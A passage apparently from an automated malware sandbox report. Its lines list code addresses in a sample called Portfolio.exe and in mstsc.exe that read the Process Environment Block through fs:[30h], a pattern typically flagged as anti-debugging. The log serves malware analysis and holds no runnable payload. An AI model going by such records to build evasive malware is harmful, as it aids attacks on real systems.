Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A3A1C mov eax, dword ptr fs:[00000030h]	3_2_019A3A1C
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BA61C mov eax, dword ptr fs:[00000030h]	3_2_019BA61C
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BA61C mov eax, dword ptr fs:[00000030h]	3_2_019BA61C
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01985210 mov eax, dword ptr fs:[00000030h]	3_2_01985210
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01985210 mov ecx, dword ptr fs:[00000030h]	3_2_01985210
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01985210 mov eax, dword ptr fs:[00000030h]	3_2_01985210
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01985210 mov eax, dword ptr fs:[00000030h]	3_2_01985210
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198AA16 mov eax, dword ptr fs:[00000030h]	3_2_0198AA16
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198AA16 mov eax, dword ptr fs:[00000030h]	3_2_0198AA16
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01998A0A mov eax, dword ptr fs:[00000030h]	3_2_01998A0A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198C600 mov eax, dword ptr fs:[00000030h]	3_2_0198C600
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198C600 mov eax, dword ptr fs:[00000030h]	3_2_0198C600
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198C600 mov eax, dword ptr fs:[00000030h]	3_2_0198C600
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B8E00 mov eax, dword ptr fs:[00000030h]	3_2_019B8E00
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A3FE3F mov eax, dword ptr fs:[00000030h]	3_2_01A3FE3F
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41608 mov eax, dword ptr fs:[00000030h]	3_2_01A41608
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C4A2C mov eax, dword ptr fs:[00000030h]	3_2_019C4A2C
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C4A2C mov eax, dword ptr fs:[00000030h]	3_2_019C4A2C
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198E620 mov eax, dword ptr fs:[00000030h]	3_2_0198E620
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A3B260 mov eax, dword ptr fs:[00000030h]	3_2_01A3B260
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A3B260 mov eax, dword ptr fs:[00000030h]	3_2_01A3B260
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A58A62 mov eax, dword ptr fs:[00000030h]	3_2_01A58A62
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01989240 mov eax, dword ptr fs:[00000030h]	3_2_01989240
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01989240 mov eax, dword ptr fs:[00000030h]	3_2_01989240
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01989240 mov eax, dword ptr fs:[00000030h]	3_2_01989240
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01989240 mov eax, dword ptr fs:[00000030h]	3_2_01989240
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]	3_2_01997E41
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]	3_2_01997E41
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]	3_2_01997E41
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]	3_2_01997E41
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]	3_2_01997E41
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]	3_2_01997E41
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4AE44 mov eax, dword ptr fs:[00000030h]	3_2_01A4AE44
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4AE44 mov eax, dword ptr fs:[00000030h]	3_2_01A4AE44
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C927A mov eax, dword ptr fs:[00000030h]	3_2_019C927A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]	3_2_019AAE73
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]	3_2_019AAE73
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]	3_2_019AAE73
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]	3_2_019AAE73
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]	3_2_019AAE73
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4EA55 mov eax, dword ptr fs:[00000030h]	3_2_01A4EA55
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199766D mov eax, dword ptr fs:[00000030h]	3_2_0199766D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A14257 mov eax, dword ptr fs:[00000030h]	3_2_01A14257
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05089100 mov eax, dword ptr fs:[00000030h]	14_2_05089100
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05089100 mov eax, dword ptr fs:[00000030h]	14_2_05089100
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05089100 mov eax, dword ptr fs:[00000030h]	14_2_05089100
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05158D34 mov eax, dword ptr fs:[00000030h]	14_2_05158D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0510A537 mov eax, dword ptr fs:[00000030h]	14_2_0510A537
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A4120 mov eax, dword ptr fs:[00000030h]	14_2_050A4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A4120 mov eax, dword ptr fs:[00000030h]	14_2_050A4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A4120 mov eax, dword ptr fs:[00000030h]	14_2_050A4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A4120 mov eax, dword ptr fs:[00000030h]	14_2_050A4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A4120 mov ecx, dword ptr fs:[00000030h]	14_2_050A4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514E539 mov eax, dword ptr fs:[00000030h]	14_2_0514E539
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B4D3B mov eax, dword ptr fs:[00000030h]	14_2_050B4D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B4D3B mov eax, dword ptr fs:[00000030h]	14_2_050B4D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B4D3B mov eax, dword ptr fs:[00000030h]	14_2_050B4D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B513A mov eax, dword ptr fs:[00000030h]	14_2_050B513A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B513A mov eax, dword ptr fs:[00000030h]	14_2_050B513A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508AD30 mov eax, dword ptr fs:[00000030h]	14_2_0508AD30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05093D34 mov eax, dword ptr fs:[00000030h]	14_2_05093D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AB944 mov eax, dword ptr fs:[00000030h]	14_2_050AB944
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AB944 mov eax, dword ptr fs:[00000030h]	14_2_050AB944
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C3D43 mov eax, dword ptr fs:[00000030h]	14_2_050C3D43
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05103540 mov eax, dword ptr fs:[00000030h]	14_2_05103540
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A7D50 mov eax, dword ptr fs:[00000030h]	14_2_050A7D50
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508C962 mov eax, dword ptr fs:[00000030h]	14_2_0508C962
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508B171 mov eax, dword ptr fs:[00000030h]	14_2_0508B171
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508B171 mov eax, dword ptr fs:[00000030h]	14_2_0508B171
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AC577 mov eax, dword ptr fs:[00000030h]	14_2_050AC577
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AC577 mov eax, dword ptr fs:[00000030h]	14_2_050AC577
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05082D8A mov eax, dword ptr fs:[00000030h]	14_2_05082D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05082D8A mov eax, dword ptr fs:[00000030h]	14_2_05082D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05082D8A mov eax, dword ptr fs:[00000030h]	14_2_05082D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05082D8A mov eax, dword ptr fs:[00000030h]	14_2_05082D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05082D8A mov eax, dword ptr fs:[00000030h]	14_2_05082D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AC182 mov eax, dword ptr fs:[00000030h]	14_2_050AC182
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BA185 mov eax, dword ptr fs:[00000030h]	14_2_050BA185
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BFD9B mov eax, dword ptr fs:[00000030h]	14_2_050BFD9B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BFD9B mov eax, dword ptr fs:[00000030h]	14_2_050BFD9B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B2990 mov eax, dword ptr fs:[00000030h]	14_2_050B2990
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B35A1 mov eax, dword ptr fs:[00000030h]	14_2_050B35A1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B61A0 mov eax, dword ptr fs:[00000030h]	14_2_050B61A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B61A0 mov eax, dword ptr fs:[00000030h]	14_2_050B61A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051051BE mov eax, dword ptr fs:[00000030h]	14_2_051051BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051051BE mov eax, dword ptr fs:[00000030h]	14_2_051051BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051051BE mov eax, dword ptr fs:[00000030h]	14_2_051051BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051051BE mov eax, dword ptr fs:[00000030h]	14_2_051051BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051069A6 mov eax, dword ptr fs:[00000030h]	14_2_051069A6
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051505AC mov eax, dword ptr fs:[00000030h]	14_2_051505AC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051505AC mov eax, dword ptr fs:[00000030h]	14_2_051505AC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B1DB5 mov eax, dword ptr fs:[00000030h]	14_2_050B1DB5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B1DB5 mov eax, dword ptr fs:[00000030h]	14_2_050B1DB5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B1DB5 mov eax, dword ptr fs:[00000030h]	14_2_050B1DB5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106DC9 mov eax, dword ptr fs:[00000030h]	14_2_05106DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106DC9 mov eax, dword ptr fs:[00000030h]	14_2_05106DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106DC9 mov eax, dword ptr fs:[00000030h]	14_2_05106DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106DC9 mov ecx, dword ptr fs:[00000030h]	14_2_05106DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106DC9 mov eax, dword ptr fs:[00000030h]	14_2_05106DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106DC9 mov eax, dword ptr fs:[00000030h]	14_2_05106DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05138DF1 mov eax, dword ptr fs:[00000030h]	14_2_05138DF1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508B1E1 mov eax, dword ptr fs:[00000030h]	14_2_0508B1E1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508B1E1 mov eax, dword ptr fs:[00000030h]	14_2_0508B1E1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508B1E1 mov eax, dword ptr fs:[00000030h]	14_2_0508B1E1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509D5E0 mov eax, dword ptr fs:[00000030h]	14_2_0509D5E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509D5E0 mov eax, dword ptr fs:[00000030h]	14_2_0509D5E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0514FDE2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0514FDE2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0514FDE2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0514FDE2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051141E8 mov eax, dword ptr fs:[00000030h]	14_2_051141E8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05154015 mov eax, dword ptr fs:[00000030h]	14_2_05154015
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05154015 mov eax, dword ptr fs:[00000030h]	14_2_05154015
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05107016 mov eax, dword ptr fs:[00000030h]	14_2_05107016
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05107016 mov eax, dword ptr fs:[00000030h]	14_2_05107016
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05107016 mov eax, dword ptr fs:[00000030h]	14_2_05107016
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141C06 mov eax, dword ptr fs:[00000030h]	14_2_05141C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0515740D mov eax, dword ptr fs:[00000030h]	14_2_0515740D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0515740D mov eax, dword ptr fs:[00000030h]	14_2_0515740D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0515740D mov eax, dword ptr fs:[00000030h]	14_2_0515740D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106C0A mov eax, dword ptr fs:[00000030h]	14_2_05106C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106C0A mov eax, dword ptr fs:[00000030h]	14_2_05106C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106C0A mov eax, dword ptr fs:[00000030h]	14_2_05106C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106C0A mov eax, dword ptr fs:[00000030h]	14_2_05106C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509B02A mov eax, dword ptr fs:[00000030h]	14_2_0509B02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509B02A mov eax, dword ptr fs:[00000030h]	14_2_0509B02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509B02A mov eax, dword ptr fs:[00000030h]	14_2_0509B02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509B02A mov eax, dword ptr fs:[00000030h]	14_2_0509B02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B002D mov eax, dword ptr fs:[00000030h]	14_2_050B002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B002D mov eax, dword ptr fs:[00000030h]	14_2_050B002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B002D mov eax, dword ptr fs:[00000030h]	14_2_050B002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B002D mov eax, dword ptr fs:[00000030h]	14_2_050B002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B002D mov eax, dword ptr fs:[00000030h]	14_2_050B002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BBC2C mov eax, dword ptr fs:[00000030h]	14_2_050BBC2C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BA44B mov eax, dword ptr fs:[00000030h]	14_2_050BA44B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511C450 mov eax, dword ptr fs:[00000030h]	14_2_0511C450
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511C450 mov eax, dword ptr fs:[00000030h]	14_2_0511C450
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A0050 mov eax, dword ptr fs:[00000030h]	14_2_050A0050
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A0050 mov eax, dword ptr fs:[00000030h]	14_2_050A0050
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05151074 mov eax, dword ptr fs:[00000030h]	14_2_05151074
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05142073 mov eax, dword ptr fs:[00000030h]	14_2_05142073
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A746D mov eax, dword ptr fs:[00000030h]	14_2_050A746D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05089080 mov eax, dword ptr fs:[00000030h]	14_2_05089080
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509849B mov eax, dword ptr fs:[00000030h]	14_2_0509849B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05103884 mov eax, dword ptr fs:[00000030h]	14_2_05103884
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05103884 mov eax, dword ptr fs:[00000030h]	14_2_05103884
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C90AF mov eax, dword ptr fs:[00000030h]	14_2_050C90AF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B20A0 mov eax, dword ptr fs:[00000030h]	14_2_050B20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B20A0 mov eax, dword ptr fs:[00000030h]	14_2_050B20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B20A0 mov eax, dword ptr fs:[00000030h]	14_2_050B20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B20A0 mov eax, dword ptr fs:[00000030h]	14_2_050B20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B20A0 mov eax, dword ptr fs:[00000030h]	14_2_050B20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B20A0 mov eax, dword ptr fs:[00000030h]	14_2_050B20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BF0BF mov ecx, dword ptr fs:[00000030h]	14_2_050BF0BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BF0BF mov eax, dword ptr fs:[00000030h]	14_2_050BF0BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BF0BF mov eax, dword ptr fs:[00000030h]	14_2_050BF0BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0511B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511B8D0 mov ecx, dword ptr fs:[00000030h]	14_2_0511B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0511B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0511B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0511B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0511B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05158CD6 mov eax, dword ptr fs:[00000030h]	14_2_05158CD6
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106CF0 mov eax, dword ptr fs:[00000030h]	14_2_05106CF0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106CF0 mov eax, dword ptr fs:[00000030h]	14_2_05106CF0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05106CF0 mov eax, dword ptr fs:[00000030h]	14_2_05106CF0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050858EC mov eax, dword ptr fs:[00000030h]	14_2_050858EC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051414FB mov eax, dword ptr fs:[00000030h]	14_2_051414FB
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511FF10 mov eax, dword ptr fs:[00000030h]	14_2_0511FF10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0511FF10 mov eax, dword ptr fs:[00000030h]	14_2_0511FF10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BA70E mov eax, dword ptr fs:[00000030h]	14_2_050BA70E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BA70E mov eax, dword ptr fs:[00000030h]	14_2_050BA70E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514131B mov eax, dword ptr fs:[00000030h]	14_2_0514131B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0515070D mov eax, dword ptr fs:[00000030h]	14_2_0515070D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0515070D mov eax, dword ptr fs:[00000030h]	14_2_0515070D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AF716 mov eax, dword ptr fs:[00000030h]	14_2_050AF716
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05084F2E mov eax, dword ptr fs:[00000030h]	14_2_05084F2E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05084F2E mov eax, dword ptr fs:[00000030h]	14_2_05084F2E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BE730 mov eax, dword ptr fs:[00000030h]	14_2_050BE730
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508DB40 mov eax, dword ptr fs:[00000030h]	14_2_0508DB40
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509EF40 mov eax, dword ptr fs:[00000030h]	14_2_0509EF40
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05158B58 mov eax, dword ptr fs:[00000030h]	14_2_05158B58
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508F358 mov eax, dword ptr fs:[00000030h]	14_2_0508F358
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508DB60 mov ecx, dword ptr fs:[00000030h]	14_2_0508DB60
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509FF60 mov eax, dword ptr fs:[00000030h]	14_2_0509FF60
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B3B7A mov eax, dword ptr fs:[00000030h]	14_2_050B3B7A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B3B7A mov eax, dword ptr fs:[00000030h]	14_2_050B3B7A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05158F6A mov eax, dword ptr fs:[00000030h]	14_2_05158F6A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05107794 mov eax, dword ptr fs:[00000030h]	14_2_05107794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05107794 mov eax, dword ptr fs:[00000030h]	14_2_05107794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05107794 mov eax, dword ptr fs:[00000030h]	14_2_05107794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05091B8F mov eax, dword ptr fs:[00000030h]	14_2_05091B8F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05091B8F mov eax, dword ptr fs:[00000030h]	14_2_05091B8F
